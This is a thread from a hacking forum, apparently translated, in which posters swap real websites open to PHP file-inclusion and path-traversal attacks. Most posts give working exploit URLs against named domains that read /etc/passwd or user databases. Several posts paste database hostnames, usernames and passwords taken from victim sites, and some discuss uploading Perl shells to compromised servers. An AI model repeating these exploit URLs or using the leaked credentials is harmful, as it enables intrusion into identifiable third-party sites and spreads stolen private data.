PHP Injections

Discussion in 'Vulnerabilities' started by Joker-jar, 20 Apr 2007.

  1. .Striker

    .Striker Elder

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
     
  2. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://photos.gavintech.com renders nicely formatted, pleasant to read
     
  3. .Striker

    .Striker Elder
     
  4. Ded MustD!e

    Ded MustD!e Banned
    http://www.verwirrend.de/
     
  5. .Striker

    .Striker Elder
    usina.com
     
  6. .Striker

    .Striker Elder
    bteb-bd.org
    managed to pull the DB info with the file reader
    Code:
    $host       = "mysql229.secureserver.net";
    $dbusername = "btebonline";
    $dbpassword = "btebreg";
    $dbname     = "btebonline";
    ;)
     
    1 person likes this.
  7. Fugitif

    Fugitif Elder

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.bnieast.com/cgi-bin/db.pl?h=../../../../../../etc/passwd%00
     
  8. .Striker

    .Striker Elder
    +
    admin accounts for the site
    Code:
    http://www.clfns.com/news/file.php?file=../../data/users.db.php
     
  9. Spyder

    Spyder Elder

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
     
    2 people like this.
  10. .Striker

    .Striker Elder
    Code:
    http://www.mscorecard.com/mscorecard/getfile.php?file=../../../../../../../../../../../etc/passwd
    database
    Code:
    $db = mysql_connect("mysql3.nebula.fi", "velocor", "2xAaQf7M") or die ("Error connecting to database.");
    mysql_select_db("velocor", $db) or die ("Error connecting to database.");
     
    2 people like this.
  11. Spyder

    Spyder Elder
    there seem to be no writable folders here =)
    here there are folders, could try uploading a perl shell =\
     
    4 people like this.
  12. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    =\\

     
  13. .Striker

    .Striker Elder
    Code:
    http://www.ph3.org/fdload.php?file=../../../../../../../../../../../etc/passwd
    mm, database )
    Code:
    $storeConfig['type'] = 'mysqlt';
    $storeConfig['hostname'] = 'localhost';
    $storeConfig['database'] = 'ph3org_gallery';
    $storeConfig['username'] = 'ph3org_onsec';
    $storeConfig['password'] = '4x4pajer0';
    $storeConfig['tablePrefix'] = 'g2_';
    $storeConfig['columnPrefix'] = 'g_';
     
    1 person likes this.
  14. Ch3ck

    Ch3ck Elder

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    I've had this link in my PMs since November of last year :) No matter how much I messed with it, I never managed to upload anything...
     
    1 person likes this.
  15. Spyder

    Spyder Elder
    I looked: the folder where the info.pl script lives already has uploaded perl shells, but when you try to run them you get "service temporary unavailable"
     
  16. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
     
    3 people like this.
  17. n3m0

    n3m0 Elder

    Joined:
    11 May 2007
    Messages:
    133
    Likes Received:
    92
    Reputations:
    11
    :)
     
    2 people like this.
  18. August12

    August12 Member

    Joined:
    11 Nov 2007
    Messages:
    4
    Likes Received:
    7
    Reputations:
    1
    Serbia


    Russia

     
    #718 August12, 17 Jun 2008
    Last edited: 17 Jun 2008
    3 people like this.
  19. Fluxoid

    Fluxoid New Member

    Joined:
    12 Jun 2008
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.allsidige.no/elementer.php?file=[INCLUDE]
    http://www.cdb.com.kh/index.php?url=[INCLUDE]
    http://www.elma.se/index.php?url=[INCLUDE]
    http://www.pqfilm.ru/head.php?id=23&file=[INCLUDE]
    
     
    #719 Fluxoid, 17 Jun 2008
    Last edited: 18 Jun 2008
    1 person likes this.
  20. Ch3ck

    Ch3ck Elder
    _http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f=../